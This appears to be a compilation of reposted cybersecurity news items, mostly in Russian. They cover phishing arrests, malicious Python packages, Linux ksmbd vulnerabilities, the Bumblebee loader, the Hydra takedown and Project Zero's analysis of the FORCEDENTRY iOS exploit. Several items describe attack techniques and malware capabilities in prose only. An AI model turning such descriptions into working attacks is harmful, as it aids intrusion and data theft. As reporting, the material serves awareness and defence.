Используемое в эксплоите разыменование указателя NULL устранено в октябре, но так как выявление похожих проблем не является редкостью и они ранее трактовались как ошибки, а не уязвимости, разработчики добавят в ядро Linux общую защиту для предотвращения атак, манипулирующих генерацией состояний "oops". В частности, в состав ядра 6.2 приняты изменения, ограничивающие максимальное число "oops". После достижения лимита, который по умолчанию выставлен в 10 тысяч oops (при желании можно изменить через параметр oops_limit), ядро будет инициировать переход в состояние "panic" с последующей перезагрузкой, что не позволит добиться необходимого для обнуления refcount числа итераций. Ограничение также планируют перенести в ранее выпущенные, но ещё поддерживаемые, ветки ядра, а также в пакеты с ядром популярных дистрибутивов.
Верховный суд постановил отменить уголовное преследование россиянина за скачивание порнофильмов на свой ПК. Его обвиняли в распространении порнографии, но Верховный суд счел его невиновным. В такой ситуации может оказаться каждый житель России, скачивающий порно на домашний компьютер.
Порно – не повод для уголовного преследования
Коллекция порно, годами пополняющаяся благодаря торрентам и спец-сайтам, не является основанием для заточения россиян в тюрьму, пишет «Коммерсант». Такое решение вынес Верховный суд России (ВС).
Верховный суд рассматривал дело Павла Мухина, которого обвинили в хранении и распространении материалов «для взрослых», вследствие чего он получил условный срок. Суд нижестоящей инстанции постановил, что в его действиях отсутствовал состав преступления. Его решение попыталась оспорить Генпрокуратура, представители которой заявили, что прекращение уголовного преследования в адрес Мухина «исказило суть правосудия». В дальнейшем дело было передано в российский ВС.
История судебного противостояния
Павел Мухин получил три года лишения свободы условно с дополнительным испытательным сроком на полгода в марте 2021 г. по решению Керченского городского суда Республики Крым. Он был осужден по пп. «а», «г» ч. 2 ст. 2421 УК РФ («Незаконные изготовление и оборот порнографических материалов или предметов»).
Суд нижестоящей инстанции не увидел в действиях Мухина состава преступления. Генпрокуратура оспорить его решение. Ее аргументом было признание самого Мухина в том, что на его личном ПК была установлена утилита, которая «автоматически формирует в хранилище все скачанные им файлы и делает их доступными для обмена с пользователями интернета». Судя по всему, речь о torrent-клиенте.
По версии Генпрокуратуры, Мухин признался в скачивании порноконтента, следовательно, он прекрасно понимал, что этот файл будет доступен неограниченному кругу лиц, то есть занимался его распространением».
Ознакомившись с материалами дела, Верховный суд встал на сторону обвиняемого, указав, что в его показаниях говорится, что он «практически сразу удалил» злосчастный ролик. Другими словами, Мухин «как таковой цели распространения этого файла он не преследовал».
В пользу невиновности Мухина говорил и тот факт, что на его ПК, которые были изъяты во время обыска, нужный стороне обвинения файл обнаружен не был.
На основании всего этого ВС посчитал законным решение нижестоящей инстанции о прекращении уголовного преследования Мухина «в связи с отсутствием состава преступления».
Правоохранительные органы Украины задержали девять членов киберпреступной группировки, которая управляла более чем 400 фишинговыми веб-сайтами. Ресурсы были замаскированы под порталы европейских организаций, предлагающих финансовую помощь стране.
Размещённые на таких сайтах формы для ввода отправляли информацию злоумышленникам. Именно так утекали данные банковских карт, логины и пароли от онлайн-банкинга и т. п.
Получив все нужные сведения, киберпреступники могли переводить деньги жертв на свои счета и совершать другие несанкционированные транзакции.
По данным украинских правоохранителей, общий ущерб от деятельности арестованных мошенников составил 100 миллионов гривен (173 миллиона рублей по текущему курсу). При этом пострадали около пяти тысяч граждан.
Пользователи, которые вводили данные на одном из фишинговых сайтов, должны уведомить об этом киберполицию и банк, обслуживающий их счета. Список вредоносных веб-ресурсов, которые находились под контролем группировки, выглядит так:
[](https://www.anti- malware.ru/files/phishing-sites.png)
Правоохранители не уточняют, как именно граждан заманивали на сайты, однако вряд ли мошенники использовали какой-то новый приём. Скорее всего, это происходило банально: через спам-рассылки, посты в соцсетях и сообщения в мессенджерах.

Киберполиция Украины опубликовала видео задержания участников киберпреступной группы, в ходе которого стражи правопорядка изъяли компьютерное оборудование, банковские карты и пр.
video:
Специалисты «Лаборатории Касперского» выпустили [аналитический
отчет](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2021/09/13133152/Incident-Response-Analyst-Report-
ru-2021.pdf), посвященный реагированию на инциденты. Исследователи пришли к
выводу, что в 2020 году для проникновения в сети организаций хакеры чаще всего
использовали брутфорс.
Инциденты, которые расследовала компания в прошлом году, в основном были
связаны с кражей денег, утечками данных, атаками шифровальщиков либо
подозрительной активностью в сети.
При этом доля брутфорс-атак по всему миру выросла с 13% до почти 32% (по
сравнению с 2019 годом). Эксперты связывают это с массовым переходом компаний
на дистанционную работу в условиях пандемии и более частым использованием
протокола RDP. Атаки, которые начинаются с подбора пароля, теоретически легко
обнаружить, но на практике до нанесения ущерба удается остановить лишь
небольшую их часть.
[](https://xakep.ru/wp-
content/uploads/2021/09/359083/stats.png)
Второй по распространенности метод проникновения в систему — эксплуатация
уязвимостей. Доля таких инцидентов составила 31,5%. В подавляющем большинстве
случаев злоумышленники использовали давно известные, но не закрытые на
корпоративных устройствах баги, включая CVE-2019-11510, CVE-2018-8453 и
CVE-2017-0144.
[](https://xakep.ru/wp-
content/uploads/2021/09/359083/stats2.png)
Более половины всех атак были обнаружены в течение нескольких часов (18%) или
дней (55%). Некоторые длились в среднем около 90 дней.
Подавляющее число краж денег и утечек данных происходило в странах СНГ (67% и
57% от всех подобных обращений в мире). При этом доля атак программ-
шифровальщиков в регионе составила 22%.
[](https://xakep.ru/wp-
content/uploads/2021/09/359083/stats3.png)
Ранее на этой неделе французское Национальное агентство безопасности информационных систем (ANSSI) заявило, что группа российских «правительственных» хакеров Sandworm (она же Telebots, BlackEnergy, Voodoo Bear) стояла за длившейся три года операцией, в результате которой был взломан ряд французских организаций.
Произошедшие взломы ANSSI связало с мониторинговой платформой Centreon, разработанной одноименной французской компанией. В сущности, этот продукт почти аналогичен по функциональности платформе Orion компании SolarWinds, о компрометации которой стало известно в декабре прошлого года. Среди клиентов Centreon числится немало известных организаций, включая Airbus, Air France KLM, Agence France-Presse (AFP), Euronews, Orange, Arcelor Mittal, Sephora и даже Министерство юстиции Франции.
Представители Centreon поспешили выпустить собственный пресс-релиз, в котором называют заявления ANSSI «чрезвычайно разрушительными» и пишут, что будут запрашивать у агентства разъяснения.
В Centreon уверяют, что ни один из коммерческих клиентов компании не пострадал от атак (это касается и клиентов в государственном секторе), а инциденты затронули лишь тех, кто загрузил опенсорсную версию Centreon, которую компания бесплатно размещает на своем сайте.
«Согласно нашим переговорам с ANSSI за последние сутки, лишь около 15 организаций были целями этой кампании, и все они являлись пользователями устаревшей опенсорсной версии (v2.5.2), которая не поддерживается уже более пяти лет», — гласит заявление Centreon.
Click to expand...
Фактически в компании уверяют, что пострадавшие сами развернули в своих системах устаревшую версию ПО, «не заботясь о безопасности своих серверов и сетей», а платформа Centreon надежна и не подвергалась компрометации.
Источник: xakep.ru/2021/02/17/centreon-statement/
Google выпустила API Google Play Integrity, которая умеет проверять приложения на подлинность и блокировать доступ к ним.
Работает так:
— Вы устанавливаете приложение, которое не хотите или не можете купить;
— API понимает это и выводит на весь экран окно: «Купите приложение в Google
Play»;
— Вы отказываетесь и разработчик блокирует вам доступ.
API уже используется в некоторых играх и приложениях. Ко всему прочему, это означает, что сторонние магазины также смогут блокировать.
Russian cybersecurity company Kaspersky Lab will “gradually wind down” its US operations and lay off its US-based employees after the Department of Commerce announced a ban on the firm selling its products in the United States, Kaspersky said Monday.
The shutdown of Kaspersky Lab’s US operations will start on July 20, ending nearly two decades of the company operating in the country, according to the company’s statement.
“The company has carefully examined and evaluated the impact of the US legal requirements and made this sad and difficult decision as business opportunities in the country are no longer viable,” Kaspersky Lab said.
Independent journalist Kim Zetter first reported the news of the company’s shutdown. The Commerce Department last month announced the ban of the sale and provision of Kaspersky software in the United States, citing national security concerns.
US officials have claimed that the Russian government could use Kaspersky’s popular anti-virus software to surveil Americans through hacking or data collection. Kaspersky has strenuously denied those claims.
More than 400 million people and 240,000 companies worldwide use Kaspersky Lab’s software products, according to the company. Just how many of those people and companies are in the United States is not clear.
US government agencies were already banned from using Kaspersky Lab software but the Commerce Department’s move to prevent the sale of the software in the United States was unprecedented. The legal authorities cited by the Commerce Department are relatively new and derived in part from a 2021 executive order that President Joe Biden signed in the name of protecting Americans’ personal data from “foreign adversaries” and a related order signed by then-President Donald Trump in 2019.
CNN reported in April that the Commerce Department was taking action against Kaspersky Lab.
Founded in Moscow in 1997, Kaspersky Lab grew into one of the world’s most successful anti-virus software companies alongside American rivals like McAfee and Symantec. Kaspersky Lab’s researchers, recognized as top-tier in the cybersecurity industry, are known for analyzing hacking operations suspected of being carried out by a variety of governments including Russia, the United States and Israel, but also cybercriminal threats that affect everyday users.
Kaspersky Lab said in its statement Monday that it would “continue investing in strategic markets and remain committed to serving its customers and partners and ensuring their protection.”
---------------------------------------------------------------------------------------------------------
**We all know Kaspersky, what 's your opinion on this, was this ban justified? (Sorry again that the post is in English, because I don't wanna implement my poor translator skills, I am going to leave the moderator to translate it. Thank you in advance! ) **
В Ферганской области пресекли действия лица, распространявшего вредоносные вирусные приложения в мессенджере Telegram. Им оказался 16-летний житель Риштанского района Н. И. Об этом стало известно в ходе мероприятий, проводимых сотрудниками Центра кибербезопасности оперативно-розыскного департамента МВД.
В ходе доследственной проверки установлено, что подросток открыл канал «Darkweb» через профиль Romeo в мессенджере Telegram. После чего размещал и распространял на этом канале вредоносные приложения, уточнили в Центре кибербезопасности.
«В отношении Н.И. возбуждено уголовное дело по части 1 статьи 278-6 «Создание, использование или распространение вредоносных программ» Уголовного кодекса Республики Узбекистан», - отмечается в сообщении.
Также изучается причастность подростка к подобным преступлениям, которые были совершены ранее и остались нераскрытыми.
В Центре кибербезопасности напомнили, что в соответствии с законодательством за преступные действия, предусмотренные пунктом 1 статьи 278-6 УК, налагается штраф от 100 до 300 базовых расчетных величин (от 34 до 102 млн сумов) или ограничение свободы на срок до двух лет либо лишение свободы на срок до двух лет.
sc: t.me/cyber_102/3219
Прокуратура Томской области потребовала от «Томскводоканала» демонтировать майнинговую ферму, работавшую на мощностях предприятия.
Сотрудники надзорного ведомства провели проверку после многочисленных жалоб жителей поселка Кайдаловка на шум, исходящий с территории водозабора.
Его источником оказались две газопоршневые установки, от которых питалось оборудование для добычи криптовалют.
Прокуратура через суд потребовала от ресурсоснабжающей организации демонтировать оборудование.
Прокуратура обратилась в суд с требованием демонтировать ферму и указала на отсутствие у «Томскводоканала» лицензии на эксплуатацию газопоршневых установок, являющихся опасным производственным объектом.
Открыто два дела об административных правонарушениях по фактам самовольного подключения к электросетям и нарушения требований промышленной безопасности.
На протяжении последнего полугода исследователи наблюдали за киберпреступной кампанией, которая постепенно совершенствовалась и набирала силу. Цель этой кампании — установить на опенсорсные платформы вредоносные пакеты для кражи данных.
Всего таких пакетов нашлось 272, а их общее число загрузок составило около 75 тысяч. Команда Checkmarx Supply Chain Security, наблюдавшая за этой активностью с апреля, нашла скрытый злонамеренный код, вытаскивающий конфиденциальные данные жертвы.
При этом эксперты [отмечают](https://checkmarx.com/blog/the-evolutionary-tale- of-a-persistent-python-threat/) заметно растущий уровень профессионализма киберпреступников, поскольку в последних атаках они усовершенствовали слои обфускации и способы ухода от детектирования.
В качестве примера исследователи приводят файл «_init_py», загружающийся только после проверки хоста: если это виртуальная система, вредонос просто не запустится.
Операторов зловреда интересует следующая информация:
наличие работающих антивирусов в системе;
список задач, пароли от Wi-Fi, информация о хосте;
учётные данные, история браузера, cookies, платёжные сведения — всё это должно быть сохранено в браузере;
данные криптовалютных кошельков вроде Atomic и Exodus;
телефонные номера, адреса электронной почты, значки Discord;
данные игрока в Minecraft и Roblox.
Помимо этого, вредонос снимает скриншоты и крадёт определённые файлы, хранящиеся на рабочем столе и в директориях «Изображения», «Музыка», «Документы», «Видео», «Загрузки».
Буфер обмена жертвы также постоянно мониторится: зловред пытается найти и подменить там адреса криптокошельков.
При этом интересно, что злоумышленники используют в пакетах не менее [70 слоёв обфускации](https://medium.com/checkmarx-security/a-deep-dive-into-70-layers- of-obfuscated-info-stealer-malware-bdeeac0f04db).
Мошенники в течение года размещали объявления о продаже дешевых автомобилей на одном из сайтов бесплатных объявлений.
В Черниговской области разоблачили группу злоумышленников, организовавших продажу несуществующих авто через интернет. Мошенники обманули более двадцати граждан из разных областей Украины на сумму более 800 тысяч гривен. Об этом сообщили в Национальной полиции.
Полицейские установили личности всех причастных к преступлениям. Ими оказались жители Прилук в возрасте от 25 до 30 лет.
Было установлено, что мошенники в течение года размещали объявления о продаже дешевых автомобилей на одном из сайтов бесплатных объявлений.
"Потенциальных клиентов фигуранты склоняли к обязательной предоплате. После поступления денег на банковские карты мошенники прекращали выходить на связь и блокировали клиентов. Суммарный доход подозреваемых от преступной деятельности превысил 800 тысяч гривен", - говорится в сообщении.
В ходе санкционированных обысков правоохранители изъяли банковские и сим- карты, смартфоны, ноутбуки. Кроме этого, изъяты другие вещественные доказательства причастности членов группировки к совместной преступной деятельности.
Следователи расследуют уголовное производство по ч. 3 ст. 190 Уголовного кодекса Украины. Ее максимальная санкция предусматривает лишение свободы сроком до 5 лет.
Ранее мы писали, что украинцы могут пострадать от действий злоумышленников во время онлайн-шопинга. Чтобы не стать жертвой мошенников, следует соблюдать платежную безопасность.
Код:
— Департамент Кіберполіції ](https://cyberpolice.gov.ua/news/na- chernigivshhyni-policzejski-prypynyly-diyalnist-grupy-internet- shaxrayiv-3743/)
Департамент Кіберполіції Національної поліції України
cyberpolice.gov.ua
В модуле ksmbd, предлагающем встроенную в ядро Linux реализацию файлового сервера на базе протокола SMB, выявлено 14 уязвимостей, из которых четыре позволяют удалённо добиться выполнения своего кода с правами ядра. Атака может быть проведена без аутентификации, достаточно чтобы на системе был активирован модуль ksmbd. Проблемы проявляются начиная с ядра 5.15, в состав которого был принят модуль ksmbd. Уязвимости устранены в обновлениях ядра 6.3.2, 6.2.15, 6.1.28 и 5.15.112.
Выявленные проблемы:
• CVE-2023-32254, CVE-2023-32250, CVE-2023-32257, CVE-2023-32258 - удалённое выполнение кода с правами ядра из-за отсутствия должных блокировок объектов при обработке внешних запросов, содержащих команды SMB2_TREE_DISCONNECT, SMB2_SESSION_SETUP, SMB2_LOGOFF и SMB2_CLOSE, что приводит к эксплуатируемому состоянию гонки. Атака может быть осуществлена без прохождения аутентифицикации.
• CVE-2023-32256 - утечка содержимого областей памяти ядра из-за состояния гонки при обработке команд SMB2_QUERY_INFO и SMB2_LOGOFF. Атака может быть осуществлена без прохождения аутентифицикации.
• CVE-2023-32252, CVE-2023-32248 - удалённый отказ в обслуживании из-за разыменования нулевого указателя при обработке команд SMB2_LOGOFF, SMB2_TREE_CONNECT и SMB2_QUERY_INFO. Атака может быть осуществлена без прохождения аутентифицикации.
• CVE-2023-32249 - возможность перехвата сеанса с пользователем из-за отсутствия должной изоляции при обработке идентификатора сеанса в многоканальном режиме.
• CVE-2023-32247, CVE-2023-32255 - отказ в обслуживании из-за утечки памяти при обработке команды SMB2_SESSION_SETUP. Атака может быть осуществлена без прохождения аутентифицикации.
• CVE-2023-2593 - отказ в обслуживании из-за исчерпания доступной памяти, вызванный ошибкой, приводящей к невозвращению памяти при обработке новых TCP-соединений. Атака может быть осуществлена без прохождения аутентифицикации.
• CVE-2023-32253 - отказ в обслуживании из-за возникновения взаимной блокировки при обработке команды SMB2_SESSION_SETUP. Атака может быть осуществлена без прохождения аутентифицикации.
• CVE-2023-32251 - отсутствие защиты от атак по подбору параметров аутентификации (brute force).
• CVE-2023-32246 - локальный пользователь системы, имеющий право выгрузки модуля ksmbd, может добиться выполнения своего кода на уровне ядра Linux.
Кроме того, ещё 5 уязвимостей выявлены в пакете ksmbd-tools, включающем утилиты для управления и работы с ksmbd, выполняемые в пространстве пользователя. Наиболее опасные уязвимости (ZDI- CAN-17822, ZDI- CAN-17770, ZDI- CAN-17820, CVE пока не назначены) позволяют удалённому неаутентифицированному атакующему выполнить свой код с правами root. Уязвимости вызваны отсутствием проверки размера принимаемых внешних данных перед их копированием в буфер в коде сервиса WKSSVC и в обработчиках опкодов LSARPC_OPNUM_LOOKUP_SID2 и SAMR_OPNUM_QUERY_USER_INFO. Ещё две уязвимости (ZDI- CAN-17823, ZDI- CAN-17821) могут привести к удалённому отказу в обслуживании без прохождения аутентифицикации.
Ksmbd преподносится как высокопроизводительное и готовое для применения на встраиваемых устройствах расширение к Samba, при необходимости интегрируемое с инструментами и библиотеками Samba. Поддержка обеспечения работы SMB-сервера при помощи модуля ksmbd присутствует в пакете Samba, начиная с выпуска 4.16.0. В отличие от SMB-сервера, работающего в пространстве пользователя, ksmbd более эффективен с точки зрения производительности, потребления памяти и интеграции с расширенными возможностями ядра.Авторами кода ksmbd являются Namjae Jeon из компании Samsung и Hyunchul Lee из LG, а сопровождением в составе ядра занимается Стив Френч из компании Microsoft, мэйнтейнер подсистем CIFS/SMB2/SMB3 в ядре Linux и давний участник команды разработчиков Samba, внёсший значительный вклад в реализацию поддержки протоколов SMB/CIFS в Samba и Linux.
Дополнительно можно отметить две уязвимости в графическом драйвере vmwgfx, применяемом для реализации 3D-ускорения в окружениях VMware. Первая уязвимость (ZDI-CAN-20292) позволяет локальному пользователю повысить свои привилегии в системе. Уязвимость вызвана отсутствием проверки состояния буфера перед освобождением при обработке объекта vmw_buffer_object, что может привести к двойному вызову функции free. Вторая уязвимость (ZDI- CAN-20110 приводит к утечке содержимого памяти ядра из-за ошибок при организации блокировки объектов GEM.
Работяга должен был обналичить деньги 23-летнему москвичу — за вознаграждение в размере двух тысяч рублей. Однако не удержался и сбежал с полутора миллионами после того, как они поступили ему на счет банковской карты.

Как говорят в столичной полиции, пострадавший продал на указанную сумму цифровую валюту. Обратился же за помощью с 18-летнему приезжему, поскольку не мог воспользоваться своей банковской карточкой ввиду ее блокировки. Молодые люди встретились в одном из кафе на Пресненской набережной, где москвич со своего ноутбука перевел знакомому деньги.
Поймали воришку в аэропорту, когда пытался вылететь на малую родину. Является уроженцем Нового Уренгоя, говорят правоохранители. После задержания у него изъяли львиную долю похищенных денег, которые были как в наличной, так и безналичной формах.
Уроженцу ЯНАО инкриминируется мошенничество в особо крупном размере (4-я часть 159-й статьи УК России, до десяти лет лишения свободы). После предъявления обвинения молодого человека отправили в следственный изолятор.
В дикой природе замечен Bumblebee и к сожалению речь не о трансформере, который защищает человечество от плохих пришельцев, а о новом загрузчике вредоносных программ, используемом далеко не в самых благих намерениях, как вы понимаете.
Кибергруппировки, которые ранее использовали BazaLoader и IcedID в рамках своих кампаний по распространению вредоносных программ, вооружились новой малварью под названием Bumblebee, который сейчас находится в активной разработке.
Как [сообщают специалисты из Proofpoint](https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is- still-transforming), кампании по распространению нового загрузчика, начались в марте 2022 года, при этом они частично совпадают с действиями банд Conti и Diavol, что вероятно может выступать в качестве предвестника атак программ- вымогателей. Собственно исследователи прямо так и заявили, что «субъекты угроз, использующие Bumblebee, связаны с полезными нагрузками, которые в свою очередь использовались в последующих кампаниях по вымогательству».
Bumblebee написан на C++ и спроектирован так, чтобы действовать как загрузчик для выполнения полезных нагрузок следующего этапа, включая Cobalt Strike, Sliver, Meterpreter и др.
Интересно, что рост числа обнаружений загрузчика в ландшафте угроз соответствует падению числа развертываний BazaLoader с февраля 2022 года, еще одного популярного загрузчика, используемого для доставки программ шифрования файлов и разработанного канувшей в лету бандой TrickBot, которая с тех пор была национализирована Conti.
Вектор атак, распространяющих Bumblebee, реализуется посредством фишинговых приманок электронной почты под брендом DocuSign, включающих вредоносные ссылки или вложения HTML, которые приводили потенциальных жертв к файлу ISO, размещенному на Microsoft OneDrive. Более того, встроенный URL-адрес во вложении HTML использовал систему перенаправления трафика (TDS), известную как Prometheus и доступную для продажи на закрытых хакерских площадках всего за 250 баксов в месяц.
Загрузчик необычен тем, что большая его часть стянута в одну функцию, не смотря на то, что большинство вредоносных программ разбивают инициализацию, отправку запросов и обработку ответов. Кроме того, его конфигурация хранится в виде открытого текста, хотя исследователи Proofpoint предполагают, что в будущем будут использоваться функции обфускации.
Также Bumblebee включает в себя сложные методы, позволяющие избежать обнаружения, и пока находится на активной стадии развития. Так, за последний месяц добавлены такие методы, как проверка против виртуальных машин и песочниц, а совсем недавно добавлен уровень шифрования в собственные процедуры сетевой связи, а также проверки, которые определяют, используются ли инструменты для анализа вредоносных программ в целевой системе или нет.
Малварь довольно сложная и демонстрирует постоянную активную разработку, в которой используются новые методы уклонения от обнаружения. Предполагаем, что очень скоро мы осветим не один incident response с его участием.
Министерство финансов США объявило о санкциях против криптовалютной биржи Garantex, которая была связана с незаконными транзакциями для Hydra Market. В то же время Министерство юстиции США назвало имя оператора изъятой инфраструктуры Hydra Market и связало его с многолетней причастностью к киберпреступной деятельности.
Hydra, крупнейший в мире даркнет-рынок нелегальных наркотиков, украденных данных, а также инструментов и услуг для киберпреступников, был ликвидирован вчера немецкой полицией, которая обнаружила и конфисковала его серверы.
Федеральное управление уголовной полиции Германии (BKA) сообщило, что никаких арестов не производилось, и, поскольку расследование по разоблачению операторов все еще продолжается, они не могут предоставить никакой дополнительной информации.
В ходе операции было изъято 543,3 биткойна на сумму 24,3 миллиона долларов по сегодняшнему курсу, что составляет крошечную часть огромного годового оборота Hydra от продажи наркотиков и различных незаконных услуг.
Вскоре после этого Министерство юстиции США опубликовало заявление о своем участии в правоохранительной операции и ввело санкции против операторов торговой площадки. В заявлении Министерства юстиции также упоминается 30-летний Дмитрий Олегович Павлов, гражданин России, за администрирование захваченных серверов Hydra Market и заговор с целью отмывания денег и распространения наркотиков.
Утверждается, что Павлов получил комиссионные на миллионы долларов в результате своей решающей роли в содействии деятельности Hydra.
Вчера Министерство финансов США также наложило санкции на Garantex, популярную криптовалютную биржу, работающую в башне «Федерация» в Москве.
Garantex обвиняется в содействии операциям по отмыванию денег для торговой площадки Hydra, что прямо нарушает существующие правила по борьбе с отмыванием денег и финансированием терроризма.
«Анализ известных транзакций Garantex показывает, что транзакции на сумму более 100 миллионов долларов связаны с незаконными субъектами и рынками даркнета, в том числе почти 6 миллионов долларов от российской банды RaaS Conti, а также около 2,6 миллиона долларов от Hydra», — говорится в заявлении Казначейства США.
Garantex, изначально зарегистрированный в Эстонии, уже столкнулся с проблемами с законом в этой европейской стране, потеряв лицензию на оказание услуг в феврале 2022 года после расследования, проведенного Службой финансовой разведки Эстонии.

](https://securenews.ru/u-s-sanctions-crypto-exchange-garantex-for-aiding- hydra-market/)
Министерство финансов США объявило о санкциях против криптовалютной биржи Garantex, которая была связана с незаконными транзакциями для Hydra Market. В то же время Министерство юстиции США назвало имя оператора изъятой инфраструктуры Hydra Market и связало его с многолетней причастностью к...
 securenews.ru
Эксперты по кибербезопасности обнаружили уязвимость в браузере Brave, приводящую к раскрытию информации. Разработчики интернет-обозревателя получили сведения о проблеме через платформу HackerOne. Как отметил исследователь Киртикумар Рамчандани, первым обративший внимание на брешь, Brave при использовании с Tor может раскрыть реферер. Речь идёт о специальной функции браузера. «У Brave есть функция "Новое частное окно", когда браузер использует возможности Tor. В этом случае имплементация содержит ошибку, приводящую к утечке реферера», — пишет специалист.
Источник: https://www.anti-malware.ru/news/2022-02-03-111332/38109
Хакеры начали создавать фейковые точки сетей Wi-Fi для кражи банковских данных
Хакеры начали создавать фейковые точки сетей Wi-Fi для кражи банковских данных, сообщил «Газете.Ru» директор регионального инжинирингового центра SafeNet Национальной технологической инициативы (НТИ) Денис Кувиков. По его словам, киберпреступники используют поддельные точки доступа, маскируясь под легальные, которые ассоциируются с местом подключения – кинотеатром, магазином или кафе.
«Для преступников такие точки Wi-Fi выступают «кладезем информации», — объяснил эксперт.
Названия точек чаще всего предсказуемые: MosMetro_Free, Beeline_Free_Wi-Fi, Home, DOM.RU, re:Store Demo, Hotell и тому подобное. Когда пользователь подключается к легальной точке с таким названием в первый раз, то система его устройства это запоминает, а при обнаружении такой же пытается автоматически подключиться, часто не уведомляя пользователя. В итоге киберпреступники получают доступ к трафику для сбора паролей от сетевых ресурсов: почта, учетные записи Apple, Google, банковские приложения, данные платежных карт. Также возможно переключение на фишинговые сайты.
«Число бесплатных Wi-Fi-сетей растет в разы ежегодно, при этом зачастую для подключения к ним пользователю не нужно вводить пароль и проходить авторизацию. К сожалению, такое подключение может обернуться <…> случайной или незаметной загрузкой программ-шпионов, а также утечкой конфиденциальной информации», — заявил Кувиков.
Ранее сообщалось, что киберпреступники научились следить за владельцами ПК при помощи видеокарт.
Как сообщают местные СМИ, действия Федерального агентства расследований Пакистана (FIA) основаны на запросе, поступившем от Центра сообщений о киберпреступлениях (CCRC) в Исламабаде. В нем указано, что более тысячи индивидуальных пользователей совершили транзакции на сумму 51 млн пакистанских рупий через различные криптовалютные биржи, среди которых — Binance, Coinbase и Coinmama. Власти заморозили банковские счета этих физических лиц, а также заблокировали их кредитные карты, использовавшиеся для покупки и продажи цифровых валют.
Центральный банк Пакистана запретил коммерческим банкам и другим финансовым организациям обрабатывать криптовалютные транзакции еще в 2018 году. Однако, несмотря на запрет регулятора, криптовалюты продолжают пользоваться большим спросом населения.
На прошлой неделе Федерация торгово-промышленных палат Пакистана (FPCCI) сообщила, что граждане страны владеют криптовалютами на $20 млрд. По словам президента FPCCI Насира Хаята Магуна (Nasir Hayat Magoon), за последние 12 месяцев рынок криптовалют в стране вырос на 711%. Поэтому Магун призвал правительство смягчить политику в отношении криптоактивов, адаптировав для них нормативно-правовую базу.
• Source: <https://pakobserver.net/fia-freezes-over-1000-bank-accounts-being- used-for-trading-cryptocurrencies/>
Участники проекта Google Project Zero, работающие в сфере информационной безопасности, совместно с коллегами из Apple Security Engineering and Architecture подробно изучили сложный эксплойт FORCEDENTRY, который разработан израильской компанией NSO Group и предназначен для взлома устройств на базе iOS. Результаты проделанной работы были недавно [опубликованы](https://googleprojectzero.blogspot.com/2021/12/a-deep-dive- into-nso-zero-click.html?m=1) в официальном блоге проекта.
В сообщении отмечается, что упомянутый эксплойт является одним из наиболее сложных инструментов с технической точки зрения, с которыми приходилось работать исследователям. Для его использования на устройства жертвы через приложение iMessage передаётся особым образом сконфигурированный файл с расширением GIF, который эмулирует виртуальный процессор на 70 тыс. логических элементах, используемый для выхода за пределы песочницы. После этого злоумышленники получают полный контроль над устройством жертвы, что позволяет осуществлять удалённое выполнение кода и другие действия.
Эксплойт использует уязвимость CVE-2021-30860, которая была исправлена 13 сентября, когда Apple выпустила iOS 14.8. Образец вредоносного программного обеспечения для изучения был предоставлен сотрудниками Citizen Lab. Одна из особенностей эксплойта в том, что для его использования не требуется взаимодействовать с жертвой, тогда как многие другие инструменты слежки активируются только после того, как жертва перейдёт по вредоносной ссылке. В случае FORCEDENTRY злоумышленнику не требуется отправлять фишинговое сообщение.
Атака начинается с отправки на смартфон жертвы файла с расширение GIF. В iOS для работы с текстовыми и анимированными сообщениями используется приложение iMessage, которое автоматически зацикливает GIF-анимации для более удобного просмотра. Сразу после получения анимации iMessage использует специальный API для рендеринга исходного файла в новый, который будет в зацикленном режиме воспроизводиться при просмотре.
Однако расширение GIF ещё не означает, что файл является анимацией. На деле злоумышленник использует такое расширение для передачи PDF-файла, который iMessage также пытается обработать как обычный GIF-файл. Это происходит из-за того, что используемая для определения формата файлов библиотека не обращает внимания на их расширения. Внутри PDF-файла находятся изображения в формате JBIG2 (формат сжатия картинок, который в прошлом использовался в принтерах и копировальных аппаратах). В таком формате сжатие происходит путём разделения изображения на элементы и, если находятся достаточно похожие друг на друга части, то для их последующего отображения используется один и тот же элемент.
В конечном счёте вредоносное ПО использует целочисленное переполнение для выхода за пределы буфера, для чего применяется виртуальный процессор, построенный на основе базовых логических операций при накладывании разницы элементов изображений в потоке JBIG2. Более 70 тыс. логических элементов определяют архитектуру виртуального компьютера с такими функциями, как регистры и полный 64-битный сумматор и компаратор, которые используются для поиска смещений памяти и выхода за пределы песочницы. После этого злоумышленники получают полный контроль над атакуемым устройством.
Исследователи из Project Zero своевременно уведомили Apple о выявленной проблеме. Исправление уязвимости стало частью iOS 14.8, которая была выпущена в сентябре этого года.
](https://3dnews.ru/1056263/nso-group-sozdala-eksployt-dlya-vzloma- iosustroystv-ne-trebuyushchiy-vzaimodeystviya-s-gertvoy)
Самые интересные и оперативные новости из мира высоких технологий. На нашем портале - все о компьютерном железе, гаджетах, ноутбуках и других цифровых устройствах. А также обзоры новых игр, достижения современной науки и самые любопытные онлайн-проекты.
3dnews.ru
Эксперты китайской ИБ-компании Netlab Qihoo 360 сообщили, что еще в начале текущего года власти страны задержали авторов крупного IoT-ботнета Mozi. Компания рассказала о своем участие в расследовании и этой операции в двух сообщениях в блоге, одно из которых было опубликовано еще в июне, а второе — в начале текущей недели. Исследователи пишут, что помогли отследить как инфраструктуру ботнета, так и его операторов.
Интересно, что всего неделю назад специалисты Microsoft сообщали о новом модуле Mozi, который помогает хакерам вмешиваться в трафик зараженных систем с помощью спуфинга DNS и захвата HTTP-сессий. Эксперты Netlab Qihoo 360 говорят, что этот модуль был частью нового набора функций Mozi, который операторы ботнета развернули незадолго до ареста, наряду с модулем, который устанавливает майнеры криптовалюты на зараженные системы.
Впервые [замеченный](https://blog.netlab.360.com/mozi-another-botnet-using- dht/) в 2019 году Mozi рос быстро. Так, [согласно данным](https://blog.lumen.com/new-mozi-malware-family-quietly-amasses-iot- bots/) компании Black Lotus Labs, в апреле 2020 года в состав ботнета входили уже 15 000 зараженных устройств.
Mozi распространялся самостоятельно: заражал одно устройство и развертывал на нем модуль, который использовал зараженную систему для поиска других подключенных к интернету устройств, а затем применял против них эксплоиты и подбирал простые пароли Telnet. Этот модуль-червь использовал более десяти эксплоитов, и этого вполне хватало для быстрого развития ботнета.
Также Mozi использовал протокол DHT для создания P2P-сети между всеми зараженными устройствами, позволяя ботам напрямую отправлять обновления и рабочие инструкции друг другу, что позволяло ему работать без центрального управляющего сервера.
